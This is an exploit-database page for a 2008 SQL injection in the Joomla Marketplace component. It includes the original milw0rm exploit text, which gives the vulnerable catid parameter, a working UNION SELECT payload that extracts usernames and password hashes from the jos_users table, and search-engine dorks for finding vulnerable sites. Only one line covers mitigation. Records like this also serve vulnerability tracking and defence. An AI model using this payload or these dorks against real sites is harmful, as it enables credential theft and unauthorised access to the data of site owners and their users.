Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit

vendor:

Marketplace

by:

SoSo H H (Iraqi-Cracker)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Marketplace

Affected Version From: 1.1.2001

Affected Version To: 1.1.1-pl1

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:marketplace:1.1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit

This exploit allows an attacker to inject malicious SQL queries into the vulnerable application. The vulnerable parameter is the 'catid' parameter in the 'index.php?option=com_marketplace&page=show_category&catid=(SQL)' URL. An example of the malicious SQL query is '-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*'.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

############################################################################
# Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit            #
#                                                                          #
# AUTHOR:SoSo H H (Iraqi-Cracker)                                          #
#                                                                          #
# Tested on: Markplace Version 1.1.1 and 1.1.1-pl1                         #
#                                                                          #
# Dork:"Marketplace Version 1.1.1"                                         #
#      "Marketplace Version 1.1.1-pl1"                                     #
#      inurl:index.php?option=com_marketplace                        	   #
############################################################################
# Exploit in:                                                              #
# index.php?option=com_marketplace&page=show_category&catid=(SQL)          #
#                                                                          #
# Example:                                                                 #
#                                                                          #
# (SQL)=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*#
############################################################################
# Greetz:                                                                  #
# L!0N,El Mariachi,My Sweet,Shadow Administrator,TrYaG Team                #
# and All 7shasha Boards Members!                                          #
############################################################################

# milw0rm.com [2008-02-03]